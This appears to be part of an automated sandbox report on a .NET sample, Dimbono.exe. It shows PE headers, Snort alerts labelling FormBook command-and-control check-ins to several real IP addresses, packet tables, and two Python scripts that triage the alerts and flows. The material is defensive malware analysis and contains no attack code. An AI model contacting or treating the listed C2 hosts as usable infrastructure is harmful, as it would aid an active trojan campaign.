                                                                                                Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Authenticode Signature

                                                                                                Signature Valid:
                                                                                                Signature Issuer:
                                                                                                Signature Validation Error:
                                                                                                Error Number:
                                                                                                Not Before, Not After
                                                                                                  Subject Chain
                                                                                                    Version:
                                                                                                    Thumbprint MD5:
                                                                                                    Thumbprint SHA-1:
                                                                                                    Thumbprint SHA-256:
                                                                                                    Serial:

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    Name                                 | Virtual Address | Virtual Size | Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xc228          | 0x53         | .text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xe000          | 0x10e64      | .rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY       | 0xae00          | 0x14f8       |
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x20000         | 0xc          | .reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                                                                                    Sections

                                                                                                    Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy         | Characteristics
                                                                                                    .text  | 0x2000          | 0xa284       | 0xa400   | False    | 0.322575266768  | data      | 5.26476752262   | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc  | 0xe000          | 0x10e64      | 0x11000  | False    | 0.120777803309  | data      | 3.67778786605   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc | 0x20000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    Name          | RVA     | Size    | Type                                                                        | Language | Country
                                                                                                    RT_ICON       | 0xe130  | 0x10828 | dBase III DBT, version number 0, next free block index 40                    |          |
                                                                                                    RT_GROUP_ICON | 0x1e958 | 0x14    | data                                                                        |          |
                                                                                                    RT_VERSION    | 0x1e96c | 0x30c   | data                                                                        |          |
                                                                                                    RT_MANIFEST   | 0x1ec78 | 0x1ea   | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |          |

                                                                                                    Imports

                                                                                                    DLL         | Import
                                                                                                    mscoree.dll | _CorExeMain

                                                                                                    Version Infos

                                                                                                    Description      | Data
                                                                                                    Translation      | 0x0000 0x04b0
                                                                                                    LegalCopyright   | Copyright 2021
                                                                                                    Assembly Version | 1.0.0.0
                                                                                                    InternalName     | Dimbono.exe
                                                                                                    FileVersion      | 1.0.0.0
                                                                                                    CompanyName      |
                                                                                                    LegalTrademarks  |
                                                                                                    Comments         |
                                                                                                    ProductName      | Dimbono
                                                                                                    ProductVersion   | 1.0.0.0
                                                                                                    FileDescription  | Dimbono
                                                                                                    OriginalFilename | Dimbono.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP        Dest IP
04/08/21-13:31:01.519802  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49745        80         192.168.2.4      185.199.108.153
04/08/21-13:31:01.519802  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49745        80         192.168.2.4      185.199.108.153
04/08/21-13:31:01.519802  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49745        80         192.168.2.4      185.199.108.153
04/08/21-13:31:12.230396  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49762        80         192.168.2.4      52.15.160.167
04/08/21-13:31:12.230396  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49762        80         192.168.2.4      52.15.160.167
04/08/21-13:31:12.230396  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49762        80         192.168.2.4      52.15.160.167
04/08/21-13:31:17.628393  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49763      34.102.136.180   192.168.2.4
04/08/21-13:31:22.719682  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49764        80         192.168.2.4      81.88.57.70
04/08/21-13:31:22.719682  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49764        80         192.168.2.4      81.88.57.70
04/08/21-13:31:22.719682  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49764        80         192.168.2.4      81.88.57.70
04/08/21-13:31:28.944856  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49765      154.210.110.99   192.168.2.4
04/08/21-13:31:50.143713  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49768        80         192.168.2.4      85.17.172.1
04/08/21-13:31:50.143713  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49768        80         192.168.2.4      85.17.172.1
04/08/21-13:31:50.143713  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49768        80         192.168.2.4      85.17.172.1
04/08/21-13:31:55.836994  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49771        80         192.168.2.4      123.31.43.181
04/08/21-13:31:55.836994  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49771        80         192.168.2.4      123.31.43.181
04/08/21-13:31:55.836994  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49771        80         192.168.2.4      123.31.43.181
04/08/21-13:32:01.286479  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49772      34.102.136.180   192.168.2.4
04/08/21-13:32:11.499423  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49774        80         192.168.2.4      34.102.136.180
04/08/21-13:32:11.499423  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49774        80         192.168.2.4      34.102.136.180
04/08/21-13:32:11.499423  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49774        80         192.168.2.4      34.102.136.180
04/08/21-13:32:11.618188  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49774      34.102.136.180   192.168.2.4
04/08/21-13:32:16.857335  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49775      34.102.136.180   192.168.2.4
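The alert table above mixes three ET "FormBook CnC Checkin" signatures that fire on the outbound GET with Snort's generic "403 Forbidden" rule that fires on the reply. The triage script below is an added example, not part of the Joe Sandbox report: it re-enters the 23 alert rows as a constructed pipe-delimited sample, summarises them per remote host, and pairs each flagged check-in with a 403 on the same (server, client port) within a short window, so that check-ins the server actually answered stand out from the rest. The CLIENT address and the row delimiter are assumptions of the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: the 23 rows of the report's "Snort IDS Alerts" table, re-entered as
#   timestamp|proto|sid|message|src_port|dst_port|src_ip|dst_ip
SNORT_ROWS = """\
04/08/21-13:31:01.519802|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49745|80|192.168.2.4|185.199.108.153
04/08/21-13:31:01.519802|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49745|80|192.168.2.4|185.199.108.153
04/08/21-13:31:01.519802|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49745|80|192.168.2.4|185.199.108.153
04/08/21-13:31:12.230396|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49762|80|192.168.2.4|52.15.160.167
04/08/21-13:31:12.230396|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49762|80|192.168.2.4|52.15.160.167
04/08/21-13:31:12.230396|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49762|80|192.168.2.4|52.15.160.167
04/08/21-13:31:17.628393|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49763|34.102.136.180|192.168.2.4
04/08/21-13:31:22.719682|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49764|80|192.168.2.4|81.88.57.70
04/08/21-13:31:22.719682|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49764|80|192.168.2.4|81.88.57.70
04/08/21-13:31:22.719682|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49764|80|192.168.2.4|81.88.57.70
04/08/21-13:31:28.944856|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49765|154.210.110.99|192.168.2.4
04/08/21-13:31:50.143713|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49768|80|192.168.2.4|85.17.172.1
04/08/21-13:31:50.143713|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49768|80|192.168.2.4|85.17.172.1
04/08/21-13:31:50.143713|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49768|80|192.168.2.4|85.17.172.1
04/08/21-13:31:55.836994|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49771|80|192.168.2.4|123.31.43.181
04/08/21-13:31:55.836994|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49771|80|192.168.2.4|123.31.43.181
04/08/21-13:31:55.836994|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49771|80|192.168.2.4|123.31.43.181
04/08/21-13:32:01.286479|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49772|34.102.136.180|192.168.2.4
04/08/21-13:32:11.499423|TCP|2031453|ET TROJAN FormBook CnC Checkin (GET)|49774|80|192.168.2.4|34.102.136.180
04/08/21-13:32:11.499423|TCP|2031449|ET TROJAN FormBook CnC Checkin (GET)|49774|80|192.168.2.4|34.102.136.180
04/08/21-13:32:11.499423|TCP|2031412|ET TROJAN FormBook CnC Checkin (GET)|49774|80|192.168.2.4|34.102.136.180
04/08/21-13:32:11.618188|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49774|34.102.136.180|192.168.2.4
04/08/21-13:32:16.857335|TCP|1201|ATTACK-RESPONSES 403 Forbidden|80|49775|34.102.136.180|192.168.2.4
"""

CLIENT = "192.168.2.4"  # the analysis VM's address in the report (assumed for this script)


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    msg: str
    sport: int
    dport: int
    src: str
    dst: str


def parse_alerts(text):
    """Parse pipe-delimited rows; Snort stamps are MM/DD/YY-HH:MM:SS.microseconds."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            ts, _proto, sid, msg, sport, dport, src, dst = line.split("|")
            alerts.append(Alert(datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
                                int(sid), msg, int(sport), int(dport), src, dst))
    return alerts


def is_checkin(a):    # outbound GET matched by one of the ET FormBook rules
    return "CnC Checkin" in a.msg and a.src == CLIENT


def is_forbidden(a):  # inbound HTTP 403 matched by the generic ATTACK-RESPONSES rule
    return "403 Forbidden" in a.msg and a.dst == CLIENT


def summarize_by_host(alerts):
    """Per remote host: check-in SIDs that fired, client ports used, and 403s it sent back."""
    hosts = defaultdict(lambda: {"checkin_sids": set(), "client_ports": set(), "forbidden": 0})
    for a in alerts:
        if is_checkin(a):
            hosts[a.dst]["checkin_sids"].add(a.sid)
            hosts[a.dst]["client_ports"].add(a.sport)
        elif is_forbidden(a):
            hosts[a.src]["forbidden"] += 1
    return dict(hosts)


def answered_checkins(alerts, window_s=5.0):
    """Pair each flagged check-in with a 403 on the same (server, client port) within window_s.

    Returns {(server_ip, client_port): seconds from check-in to 403}. A 403 on a client port
    that carried no flagged check-in answers a request the rules did not match and is skipped.
    """
    first_checkin = {}
    for a in alerts:
        if is_checkin(a):
            first_checkin.setdefault((a.dst, a.sport), a.ts)  # three SIDs fire on one GET
    answered = {}
    for a in alerts:
        if is_forbidden(a) and (a.src, a.dport) in first_checkin:
            delta = (a.ts - first_checkin[(a.src, a.dport)]).total_seconds()
            if 0 <= delta <= window_s:
                answered[(a.src, a.dport)] = delta
    return answered


if __name__ == "__main__":
    alerts = parse_alerts(SNORT_ROWS)
    for host, s in summarize_by_host(alerts).items():
        print(host, sorted(s["checkin_sids"]), sorted(s["client_ports"]), s["forbidden"])
    print(answered_checkins(alerts))
```

On these rows only the check-in on client port 49774 to 34.102.136.180 is followed by a 403 on the same connection (about 0.12 s later); the other four 403s arrive on ports the FormBook rules never flagged, so they belong to requests those signatures did not match. Which of the contacted hosts is the live C2 is not something the alert log alone settles; the script only separates answered from unanswered check-ins.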

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Apr 8, 2021 13:30:05.191323996 CEST  49726        80         192.168.2.4      172.67.150.212
Apr 8, 2021 13:30:05.221245050 CEST  80           49726      172.67.150.212   192.168.2.4
Apr 8, 2021 13:30:05.221424103 CEST  49726        80         192.168.2.4      172.67.150.212
Apr 8, 2021 13:30:05.222027063 CEST  49726        80         192.168.2.4      172.67.150.212
Apr 8, 2021 13:30:05.251811028 CEST  80           49726      172.67.150.212   192.168.2.4
Apr 8, 2021 13:30:05.302162886 CEST  80           49726      172.67.150.212   192.168.2.4
Apr 8, 2021 13:30:05.346678019 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.364352942 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.364466906 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.382594109 CEST  49726        80         192.168.2.4      172.67.150.212
Apr 8, 2021 13:30:05.424293041 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.442240953 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.449045897 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.449109077 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.449263096 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.457266092 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.474929094 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.475277901 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.523251057 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.542202950 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.559737921 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776842117 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776860952 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776876926 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776899099 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776916027 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776926041 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776941061 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776952028 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.776962042 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.776992083 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.777034998 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.777045012 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.777091980 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:05.777156115 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.777173996 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:05.777219057 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.050187111 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050219059 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050244093 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050260067 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050307035 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.050350904 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050353050 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.050376892 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050393105 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050436020 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.050718069 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050739050 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050781965 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.050889969 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050913095 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.050940037 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.051059961 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.051094055 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.051115990 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.051866055 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.051937103 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.051949978 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.051975012 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.051990986 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.052021980 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.052701950 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.052723885 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.052769899 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.052783012 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.052787066 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.052824974 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.053375959 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.053423882 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.053447008 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.053493977 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.053509951 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.053540945 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.054260015 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.054279089 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.054328918 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.054331064 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.054351091 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.054375887 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.055016041 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.055039883 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.055077076 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.055129051 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.055166960 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.055170059 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.055993080 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056014061 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056056023 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.056080103 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056097984 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056122065 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.056751966 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056806087 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056823015 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056822062 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.056842089 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.056886911 CEST  49727        443        192.168.2.4      104.21.56.119
Apr 8, 2021 13:30:06.067821026 CEST  443          49727      104.21.56.119    192.168.2.4
Apr 8, 2021 13:30:06.067859888 CEST  443          49727      104.21.56.119    192.168.2.4
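Per-packet rows like the ones above are easier to reason about once folded into connections. The script below is an added example and not part of the report: it takes a constructed subset of the TCP rows (the port-80 connection in full and the first five packets of the port-443 connection) plus the first two DNS exchanges from the UDP table, and aggregates them into flows keyed on the client side, with packet counts per direction and duration. Because the report's timestamps carry nanosecond fractions, which datetime.strptime cannot hold, the parser keeps the fraction separately and works in integer nanoseconds. The CLIENT address and the row delimiter are assumptions of the example.

```python
from dataclasses import dataclass
from datetime import datetime

CLIENT = "192.168.2.4"  # the analysis VM's address in the report (assumed for this script)
EPOCH = datetime(1970, 1, 1)

# Constructed sample: a subset of the report's TCP and UDP packet rows, re-entered as
#   proto|timestamp|src_port|dst_port|src_ip|dst_ip
PACKET_ROWS = """\
TCP|Apr 8, 2021 13:30:05.191323996 CEST|49726|80|192.168.2.4|172.67.150.212
TCP|Apr 8, 2021 13:30:05.221245050 CEST|80|49726|172.67.150.212|192.168.2.4
TCP|Apr 8, 2021 13:30:05.221424103 CEST|49726|80|192.168.2.4|172.67.150.212
TCP|Apr 8, 2021 13:30:05.222027063 CEST|49726|80|192.168.2.4|172.67.150.212
TCP|Apr 8, 2021 13:30:05.251811028 CEST|80|49726|172.67.150.212|192.168.2.4
TCP|Apr 8, 2021 13:30:05.302162886 CEST|80|49726|172.67.150.212|192.168.2.4
TCP|Apr 8, 2021 13:30:05.346678019 CEST|49727|443|192.168.2.4|104.21.56.119
TCP|Apr 8, 2021 13:30:05.364352942 CEST|443|49727|104.21.56.119|192.168.2.4
TCP|Apr 8, 2021 13:30:05.364466906 CEST|49727|443|192.168.2.4|104.21.56.119
TCP|Apr 8, 2021 13:30:05.382594109 CEST|49726|80|192.168.2.4|172.67.150.212
TCP|Apr 8, 2021 13:30:05.424293041 CEST|49727|443|192.168.2.4|104.21.56.119
TCP|Apr 8, 2021 13:30:05.442240953 CEST|443|49727|104.21.56.119|192.168.2.4
UDP|Apr 8, 2021 13:29:56.888344049 CEST|65248|53|192.168.2.4|8.8.8.8
UDP|Apr 8, 2021 13:29:56.901118994 CEST|53|65248|8.8.8.8|192.168.2.4
UDP|Apr 8, 2021 13:29:56.927057981 CEST|53723|53|192.168.2.4|8.8.8.8
UDP|Apr 8, 2021 13:29:56.939779997 CEST|53|53723|8.8.8.8|192.168.2.4
"""


def parse_ts_ns(text):
    """'Apr 8, 2021 13:30:05.191323996 CEST' -> integer nanoseconds since EPOCH (zone ignored).
    strptime's %f stops at microseconds, so the 9-digit fraction is handled by hand."""
    stamp, _zone = text.rsplit(" ", 1)
    whole, frac = stamp.split(".")
    secs = int((datetime.strptime(whole, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds())
    return secs * 10**9 + int(frac.ljust(9, "0"))


@dataclass
class Flow:
    proto: str
    client: str
    cport: int
    server: str
    sport: int
    packets_out: int = 0  # client -> server
    packets_in: int = 0   # server -> client
    first_ns: int = 0
    last_ns: int = 0

    @property
    def packets(self):
        return self.packets_out + self.packets_in

    @property
    def duration_s(self):
        return (self.last_ns - self.first_ns) / 1e9


def build_flows(text):
    """Fold packet rows into flows keyed (proto, client, client_port, server, server_port)."""
    flows = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        proto, ts, sp, dp, src, dst = line.split("|")
        ns = parse_ts_ns(ts)
        outbound = src == CLIENT
        key = (proto, src, int(sp), dst, int(dp)) if outbound else (proto, dst, int(dp), src, int(sp))
        flow = flows.get(key)
        if flow is None:
            flow = flows[key] = Flow(*key, first_ns=ns, last_ns=ns)
        if outbound:
            flow.packets_out += 1
        else:
            flow.packets_in += 1
        flow.first_ns = min(flow.first_ns, ns)
        flow.last_ns = max(flow.last_ns, ns)
    return flows


def dns_round_trips(flows):
    """Resolver round-trip time per UDP/53 flow that is exactly one query and one reply."""
    return {f.cport: f.duration_s for f in flows.values()
            if f.proto == "UDP" and f.sport == 53 and f.packets_out == 1 and f.packets_in == 1}


if __name__ == "__main__":
    flows = build_flows(PACKET_ROWS)
    for f in flows.values():
        print(f.proto, f"{f.client}:{f.cport} -> {f.server}:{f.sport}",
              f"out={f.packets_out} in={f.packets_in} dur={f.duration_s:.6f}s")
    print(dns_round_trips(flows))
```

On the sample the twelve TCP rows collapse to two connections and the four UDP rows to two resolver exchanges of roughly 13 ms each; run against the full tables the same code gives the per-connection packet counts that the Network Port Distribution chart summarises.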

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Apr 8, 2021 13:29:56.888344049 CEST  65248        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:29:56.901118994 CEST  53           65248      8.8.8.8          192.168.2.4
Apr 8, 2021 13:29:56.927057981 CEST  53723        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:29:56.939779997 CEST  53           53723      8.8.8.8          192.168.2.4
Apr 8, 2021 13:29:57.024849892 CEST  64646        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:29:57.051279068 CEST  53           64646      8.8.8.8          192.168.2.4
Apr 8, 2021 13:29:58.104240894 CEST  65298        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:29:58.116851091 CEST  53           65298      8.8.8.8          192.168.2.4
Apr 8, 2021 13:29:59.215184927 CEST  59123        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:29:59.228852987 CEST  53           59123      8.8.8.8          192.168.2.4
Apr 8, 2021 13:29:59.558557034 CEST  54531        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:29:59.576720953 CEST  53           54531      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:00.177397966 CEST  49714        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:00.190432072 CEST  53           49714      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:01.356641054 CEST  58028        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:01.369630098 CEST  53           58028      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:02.680725098 CEST  53097        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:02.693494081 CEST  53           53097      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:03.818811893 CEST  49257        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:03.831569910 CEST  53           49257      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:05.109535933 CEST  62389        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:05.130899906 CEST  49910        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:05.144030094 CEST  53           49910      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:05.163789034 CEST  53           62389      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:05.314856052 CEST  55854        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:05.337465048 CEST  53           55854      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:09.727493048 CEST  64549        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:09.740129948 CEST  53           64549      8.8.8.8          192.168.2.4
